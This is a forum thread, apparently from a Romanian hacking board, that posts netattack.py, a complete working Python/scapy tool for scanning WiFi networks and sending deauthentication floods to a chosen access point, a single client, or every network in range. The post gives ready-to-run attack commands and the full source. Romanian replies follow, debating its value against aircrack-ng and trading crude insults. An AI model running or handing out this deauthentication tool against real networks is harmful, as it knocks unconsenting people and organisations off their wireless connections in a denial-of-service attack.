Jump to content
Fi8sVrs

netattack - Scan and Attack Wireless Networks

Recommended Posts

  • Active Members

The netattack.py is a python script that allows you to scan your local area for WiFi Networks and perform deauthentification attacks. The effectiveness and power of this script highly depends on your wireless card.

 

netattack.png

NETATTACK 2 RELEASED

https://github.com/chrizator/netattack2/

 

REQUIREMENTS

  • Python 2.5+ (not Python 3+)
  • Modules:
    • scapy
    • argparse
    • sys
    • OS
    • threading
    • logging
  • iw(config)
  • OFC LINUX

 

 

USAGE

EASY

SCANNING FOR WIFI NETWORKS

python netattack.py -scan -mon

This example will perform a WiFi network scan. The BSSID, ESSID and the Channel will be listet in a table.

-scan | --scan

This parameter must be called when you want to do a scan. It's one of the main commands. It is searching for beacon frames that are sent by routers to notify there presence.

-mon | --monitor

By calling this parameter the script automatically detects you wireless card and puts it into monitoring mode to capture the ongoing traffic. If you know the name of your wireless card and it's already working in monitoring mode you can call

-i

This can be used instead of -mon.

 

DEAUTHENTIFICATION ATTACK

python netattack.py -deauth -b AB:CD:EF:GH:IJ:KL -u 12:34:56:78:91:23 -c 4 -mon

This command will obviously perform a deauthentification attack.

-deauth | --deauth

This parameter is a main parameter as well as scan. It is necessary to call if you want to deauth attack a certain target.

-b | --bssid

With -b you select the AP's MAC-Address (BSSID). The -deauth parameter requires one or multiple BSSID's

-u | --client

If you don't want to attack the whole network, but a single user/client/device, you can do this with -u. It is not necessary.

-c | --channel

By adding this parameter, your deauthentification attack is going to be performed on the entered channel. The usage of -c is highly recommended since the attack will be a failure if the wrong channel is used. The channel of the AP can be seen by doing a WiFi scan (-scan). If you don't add -c the attack will take place on the current channel.

The -mon or -i is necessary for this attack as well.

 

DEAUTHENTIFICATION ATTACK ON EVERYBODY

python netattack.py -deauthall -i [IFACE]

When this command is called, the script automatically searches for AP in your area. After the search it start deauth-attacking all of the found AP's. The -deauthall parameter only needs an interface to get it working. ATTENTION: If you want all of this attacks to be as efficient as possible, have a look at the following "ADVANCED"-section

 

ADVANCED

-p | --packetburst

This parameter is understood as the packetburst. Especially when you are targeting multiple AP's or even performing a -deauthall attack, the command is a must have. It defines the amount of deauth-packages to send after switching the target. When not adding the parameter it is going to be set to 64 by default. But that is highly unefficient if you are attacking 4+ AP's.

-t | --timeout

This parameter can be added to a -scan or -deauth. If it's added to the -scan parameter it defines the delay while switching the channel. It is set to 0.75s by default, so it is waiting 0.75s on each channel to collect beacon frames. If it's added to the -deauth parameter, it defines the delay between each packetburst. This can be used to decrease the intense of the attack or to attack the target(s) at a certain time.

-cf | --channelformat

This parameter can only be added to -scan. It shows a more detailed output while scanning. It's mainly recommended when the location changes and with it the AP's.


Download netattack-master.zip

Mirror:
netattack.py

#!/usr/bin/env python

import sys
import os
import time
import argparse
from threading import Thread
import logging
logging.getLogger('scapy.runtime').setLevel(logging.ERROR)
from scapy.all import *
conf.verb = 0

W  = '\033[0m'  # white (normal)
R  = '\033[31m' # red
G  = '\033[32m' # green
O  = '\033[33m' # orange
P  = '\033[35m' # purple
BOLD = '\033[1m' # bold
THIN = '\033[1m' # normal

# creating arguments
def argument_parser():
    parser = argparse.ArgumentParser(usage='''
'''+BOLD+'''SCAN NETWORKS:'''+THIN+O+'''
    -scan       (Main command)'''+W+'''
    -i or -mon  (Interfaces)
    -cf         (More detailed output format)
    -t          (Set channel switch delay)
    -nr         (Don't do a rescan)
'''+BOLD+'''DEAUTH CERTAIN NETWORKS:'''+THIN+O+'''
    -deauth     (Main command)'''+W+'''
    -b          (Add a BSSID)
    -u          (Add a client)
    -i or -mon  (Interfaces)
    -p          (Change Packetburst)
    -t          (set time Interval)
'''+BOLD+'''DEAUTH ALL NETWORKS:'''+THIN+O+'''
    -deauthall  (Main command)'''+W+'''
    -i or -mon  (Interfaces)
    -p          (Packetburst)''')

    parser.add_argument('-mon',
                        '--monitor',
                        action='store_true',
                        help='This activates the monitoring mode \
                              and automatically searches for your wlan device.')
    parser.add_argument('-scan',
                        '--scan',
                        action='store_true',
                        help='This is one of the main parameters. \
                              It searches for all available WiFi-Networks. \
                              Other parameters can be added optionally.')
    parser.add_argument('-cf',
                        '--channelformat',
                        action='store_true',
                        help='It activates the channelformat. \
                              It\'s kind of verbose layout of searching. \
                              Espacially useful if searching for 1 network.')
    parser.add_argument('-t',
                        '--timeout',
                        type=float,
                        help='This is setting a delay. \
                              It can be used to add a delay to deauth \
                              or a delay for switching the channel while scanning. \
                              DEFAULT = 0.75')
    parser.add_argument('-nr',
                        '--norescan',
                        action='store_true',
                        help='-nr can only be used with -scan. \
                              This deactivates multiple scans \
                              and stops when channel 14 is reached.')
    parser.add_argument('-deauth',
                        '--deauth',
                        action='store_true',
                        help='This is one of the main parameters. \
                              It deauth-attacks a certain BSSID. \
                              Adding a client is optionally.')
    parser.add_argument('-deauthall',
                        '--deauthall',
                        action='store_true',
                        help='This is one of the main parameters. \
                              It searches all the WiFi Networks near by \
                              and deauth-attacks them.')
    parser.add_argument('-b',
                        '--bssid',
                        nargs='*',
                        help='With this you add a BSSID to a deauth. \
                              It\'s a necessary parameter for -deauth.')
    parser.add_argument('-a',
                        '--amount',
                        default=0,
                        type=int,
                        help='This is the amount of deauth-packages to be send. \
                              It can only be used with -deauth \
                              DEFAULT = infinite')
    parser.add_argument('-u',
                        '--client',
                        default='FF:FF:FF:FF:FF:FF',
                        help='This adds a client to a deauth-attack. \
                              It can only be used with -deauth and is optionally.\
                              DEFAULT = FF:FF:FF:FF:FF:FF (Broadcast)')
    parser.add_argument('-c',
                        '--channel',
                        type=int,
                        help='This adds a channel to a deauth-attack. \
                              It can only be used with -d. \
                              If there is no certain channel the current channel will be used.')
    parser.add_argument('-p',
                        '--packetburst',
                        type=int,
                        default=64,
                        help='This sets the amount of packets in one burst. \
                              It can only be used with -d \
                              DEFAULT = 64')
    parser.add_argument('-i',
                        '--interface',
                        help='This is a necessary parameter. \
                              It calls the monitoring interface. \
                              This parameter needs to be included everywhere.')

    return parser

def throw_error():
    # invalid arguments handling
    if not args.deauth and not args.scan and not args.deauthall and not args.monitor:
        argument_parser().print_usage()
        sys.exit(0)
    if not args.interface and not args.monitor:
        print('[' +R+ '-' +W+'] No interface selected.')
        sys.exit(0)
    if args.deauth and args.channelformat:
        print('[' +R+ '-' +W+'] Parameter -cf not available when deauthing.')
        sys.exit(0)
    if args.deauth and not args.bssid:
        print('[' +R+ '-' +W+'] Error. No BSSID selected.')
        sys.exit(0)
    if args.scan and args.packetburst != 64:
        print('[' +R+ '-' +W+'] Parameter -p not available when scanning.')
    if args.scan and args.amount:
        print('[' +R+ '-' +W+'] Parameter -a not available when scanning.')
        sys.exit(0)
    if args.scan and args.bssid:
        print('[' +R+ '-' +W+'] Parameter -b not available when scanning.')
        sys.exit(0)
    if args.scan and args.deauth:
        print('[' +R+ '-' +W+'] Scan and Deauth can\'t be executed at the same time.')
        sys.exit(0)
    if args.deauth and args.norescan:
        print('[' +R+ '-' +W+'] Parameter -nr not available when deauthing.')
    if args.deauthall:
        if args.bssid or args.channel or args.amount or args.deauth or args.norescan or args.timeout or args.channelformat or args.scan:
            print('[' +R+ '-' +W+'] (1) -deauthall -i ["iface"] -p ["packets"]| no more parameters. (2) Remove -deauthall')
    if args.bssid and args.client != 'FF:FF:FF:FF:FF:FF':
        if len(args.bssid) > 1:
            print('[' +R+ '-' +W+'] Unable to add clients if there are multiple BSSIDs.')
            sys.exit(0)
    if args.interface and args.monitor:
        print('[' +R+ '-' +W+'] You can\'t use -i and -mon. Try only one of them.')
        sys.exit(0)


# # # # # # # # # # # # # # #
#           SCAN            #
# # # # # # # # # # # # # # #

# handling the packages
def pckt_handler(pckt):
    if pckt.haslayer(Dot11): #-> check if pckt type 802.11
        if pckt.type == 0 and pckt.subtype == 8: # check if Beacon frame
            if pckt.addr2 not in APs:
                APs[pckt.addr2] = on_channel #-> add to APs dict
                output_aps(pckt.addr2, pckt.info, on_channel) #-> print it out

# printing found ap
def output_aps(bssid, essid, channel):
    ch_space = 2 # leave different space for channel numbers
    if len(str(channel)) == 1:
        ch_space = 3

    if args.channelformat:
        print('[' +G+ '+' +W+ '] [' +P+ 'BSSID' +W+ '] '+str(bssid).upper()+' '*2+'|'+' '*2+'[' +P+ 'CH' +W+ '] '+str(channel)+' '*ch_space+'|'+' '*2+'[' +P+ 'ESSID' +W+ '] '+essid+'')

    else:
        print(str(bssid).upper() + '  |  ' + str(channel) + ' '*ch_space + '|  ' + str(essid))


# hopping between wifi channels
def channel_hop():
    global on_channel

    timeout = 0.75

    if args.timeout:
        timeout = args.timeout

    if not args.channelformat:
        print('\n[' +O+ '*' +W+ '] Searching for WiFi Networks...\n')
        print(O+ 'MAC' + ' '*19 + 'CH' + ' '*5 + 'ESSID' +W)

    while True:
        if on_channel > 14:
            if args.norescan:
                print('\nPress CTRL-C to quit...')
                sys.exit(0)
            elif not rescan:
                break
            else:
                on_channel = 1
                if args.channelformat:
                    print('\n--------------- RESCAN ---------------\n')
                continue

        if args.channelformat:
            print('[CHANNEL] ' + str(on_channel) + '/14')

        os.system('iwconfig ' + iface + ' channel ' + str(on_channel))

        time.sleep(timeout)
        on_channel += 1


# # # # # # # # # # # # # # #
#           DEAUTH          #
# # # # # # # # # # # # # # #

def set_channel():
    channel = 4
    if args.channel:
        channel = args.channel
    os.system('iwconfig ' + iface + ' channel ' + str(channel))

# creating and managing packets
def deauth(args):
    bssid = args.bssid
    client = args.client
    amount = args.amount
    sleep = 0
    endless = False
    if amount == 0:
        endless = True
    if args.timeout:
        sleep = args.timeout

    while endless:
        for ap in bssid:
            ap_c_pckt = Dot11(addr1=client, addr2=ap, addr3=ap) / Dot11Deauth()
            if client != 'FF:FF:FF:FF:FF:FF':
                c_ap_pckt = Dot11(addr1=ap, addr2=client, addr3=ap) / Dot11Deauth()
            try:
                for x in range(args.packetburst):
                    send(ap_c_pckt)
                    if client != 'FF:FF:FF:FF:FF:FF':
                        send(c_ap_pckt)
                print('[' +G+ '+' +W+ '] Sent Deauth-Packets to ' + ap)
                time.sleep(sleep)
            except(KeyboardInterrupt):
                print('\n[' +R+ '!' +W+ '] ENDING SCRIPT...')
                sys.exit(0)

    while amount > 0 and not endless:
        for ap in bssid:
            ap_c_pckt = Dot11(addr1=client, addr2=ap, addr3=ap) / Dot11Deauth()
            if client != 'FF:FF:FF:FF:FF:FF':
                c_ap_pckt = Dot11(addr1=ap, addr2=client, addr3=ap) / Dot11Deauth()
            try:
                for x in range(args.packetburst):
                    send(ap_c_pckt)
                    if client != 'FF:FF:FF:FF:FF:FF':
                        send(c_ap_pckt)
                print('[' +G+ '+' +W+ '] Sent Deauth-Packets to ' + ap)

                amount -= 1
                time.sleep(sleep)

            except (KeyboardInterrupt):
                print('\n[' +R+ '!' +W+ '] ENDING SCRIPT...')
                sys.exit(0)

    print('[' +R+ '!' +W+ '] Finished successfully.')


def deauth_all():
    print('\n[' +O+ '*' +W+ '] Starting deauth...\n')
    while True:
        for ap in APs:
            for x in range(args.packetburst):
                try:
                    ap_c_pckt = Dot11(addr1='ff:ff:ff:ff:ff:ff', addr2=ap, addr3=ap) / Dot11Deauth()
                    os.system('iwconfig ' + iface + ' channel ' + str(APs[ap]))
                    send(ap_c_pckt)
                except (KeyboardInterrupt):
                    print('\n[' +R+ '!' +W+ '] ENDING SCRIPT...')
                    sys.exit(0)
            print('[' +G+ '+' +W+ '] Sent Deauth-Packets to ' + str(ap).upper())


# # # # # # # # # # # # # # #
#           MONITOR         #
# # # # # # # # # # # # # # #

def monitor_on():
    ifaces = os.listdir('/sys/class/net/')
    status = False
    for iface in ifaces:
        if 'wlan' in iface:
            print('\n[' +G+ '+' +W+ '] Interface found!\nTurning on monitoring mode...')
            os.system('ifconfig ' + iface + ' down')
            os.system('iwconfig ' + iface + ' mode monitor')
            os.system('ifconfig ' + iface + ' up')
            print('[' +G+ '+' +W+ '] Turned on monitoring mode on: ' + iface)
            status = True
            return iface
    if status == False:
        print('[' +R+ '-' +W+'] No interface found. Try it manually.')
        sys.exit(0)


# # # # # # # # # # # # # # #
#           MAIN            #
# # # # # # # # # # # # # # #

if __name__ == '__main__':
    print(P+'* * * * * * * * * * * * * * * * * *')
    print('* N E T A T T A C K  by chrizator *')
    print('* * * * * * * * * * * * * * * * * *'+W)
    
    args = argument_parser().parse_args()
    APs = {}
    on_channel = 1
    rescan = True

    throw_error()

    iface = None
    if args.interface:
        iface = args.interface
    if args.monitor:
        iface = monitor_on()
    
    conf.iface = iface #-> set scapy's interface

    ## SCAN ##
    if args.scan:
        # channel hopping thread
        hop_t = Thread(target=channel_hop, args=[])
        hop_t.daemon = True
        hop_t.start()


        sniff(iface=iface, prn=pckt_handler, store=0)


    ## DEAUTH ##
    if args.deauth:
        set_channel()
        deauth(args)
        

    ## DEAUTHALL#
    if args.deauthall:
        rescan = False

        hop_t = Thread(target=channel_hop, args=[])
        hop_t.daemon = True
        hop_t.start()

        sniff(iface=iface, prn=pckt_handler, store=0, timeout=13)
        deauth_all()

Source: https://github.com/chrizator/netattack

 

  • Upvote 3
Link to comment
Share on other sites

  • Active Members
1 minute ago, fbob said:

acum explica'ne noua, muritorilor de rand, ce face asta si nu face aircrack-ng. IMHO tipul care a scris atata amar de linii.. are prea mult timp liber :)

 

Cred ca este creat in scopuri educationale, in caz ca vrei sa vezi cum functioneaza tool-urile din aircrack. Bat la pariu ca este mult mai simplu sa citesti sursele alea in C, asta daca vrei sa stii ce fac tool-urile pe care le rulezi, sau mai bine zis tool-urile alea pentru care am Kali.iso . Putem pur si simplu sa ne limitam la : airmon-ng start wlan0, airodump-ng -i wlan0 --essid plm aircrack, aia e!

  • Upvote 2
Link to comment
Share on other sites

  • Active Members
1 hour ago, fbob said:

acum explica'ne noua, muritorilor de rand, ce face asta si nu face aircrack-ng. IMHO tipul care a scris atata amar de linii.. are prea mult timp liber :)

Tu ai prea mult timp liber pentru ca , comentezi aiurea. Programarea nu se limiteaza la: "ce face ala si nu face alalalt?". O fi parerea ta, da' e proasta (IMHO, desigur). Taci acolo si vezi de treaba ta si joaca-te cu `aircrack-ng` daca nu poti sa accepti faptul ca unii oameni vor continua sa programeze ce vrea pula lor chiar daca 20 inaintea lor au facut fix acelasi lucru. Nu-mi bat capu' la ora asta mai mult.

 

1 hour ago, dancezar said:

Bat la pariu ca este mult mai simplu sa citesti sursele alea in C

Meh, depinde de nivelul la care esti :P M-am uitat acum ceva ani pe sursa aia si...era cam haos asa :)) cred ca ala o fost momentu' in care am zis: "bag pula-n el C, ma duc sa invat si altceva".

 

Pentru cei interesati, sursa e aici

  • Upvote 5
Link to comment
Share on other sites

14 hours ago, MrGrj said:

Tu ai prea mult timp liber pentru ca , comentezi aiurea. Programarea nu se limiteaza la: "ce face ala si nu face alalalt?". O fi parerea ta, da' e proasta (IMHO, desigur). Taci acolo si vezi de treaba ta si joaca-te cu `aircrack-ng` daca nu poti sa accepti faptul ca unii oameni vor continua sa programeze ce vrea pula lor chiar daca 20 inaintea lor au facut fix acelasi lucru. Nu-mi bat capu' la ora asta mai mult

 

ai inteles total gresit. sunt de acord cu faptul ca oricine poate programa ce vrea. nu sunt de acord cu cine instaleaza diverse programe care fac acelasi lucru. in sensul, de ce as instala netattack in loc de aircrack-ng. are ceva nou, ceva divers, ceva in plus?  si nu sunt de acord cu postarile doar de dragul de a posta. vad un link cu un program nou, HOP! il postez. chiar daca habar nu am la ce foloseste, sau daca e "sigur" (pt cunoscatori)

P.S. stilul raspunsurilor tale ma face sa cred ca ai ceva probleme. iti recomand o cura cu Persedon :)

  • Upvote 1
Link to comment
Share on other sites

3 minutes ago, fbob said:

nu sunt de acord cu cine instaleaza diverse programe care fac acelasi lucru.

pana sa compilezi aircrack care-i ditamai chestia, ca sa faci DOAR deauth (posibil sa poti compila direct ala de deauth, nu stiu), e mai usor sa lasi python-ul sa-ti interpreteze codul de mai sus. plus ca daca scrii cacaturi de genul, inveti 1) cum sa scrii cacatul pe care vrei sa-l implementezi in limbajul x, 2) cum functioneaza cacatul pe care-l scrii (in anumite cazuri) si 3) si cum sa implementezi cat mai bine cacatul y. my 2c.

  • Upvote 3
Link to comment
Share on other sites

34 minutes ago, fbob said:

iti recomand o cura cu Persedon

 

Pyrithyldione (Presidon, Persedon) is a psychoactive drug invented in 1949. An improved method of manufacture was patented by Roche in 1959. It was used as a hypnotic or sedative and presumed to be less toxic than barbiturates. Today, this substance is no longer used. Agranulocytosis was sometimes reported as adverse effect.

 

Agranulocytosis, also known as agranulosis or granulopenia, is an acute condition involving a severe and dangerous leukopenia(lowered white blood cell count), most commonly of neutrophils causing a neutropenia in the circulating blood. It is a severe lack of one major class of infection-fighting white blood cells. People with this condition are at very high risk of serious infections due to their suppressed immune system.

 

 

Recomandare de recomandare, sa-mi bag pula. Voi cand bagati pastile in voi, va uitati si in alta parte sa vedeti despre ce e vorba?

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...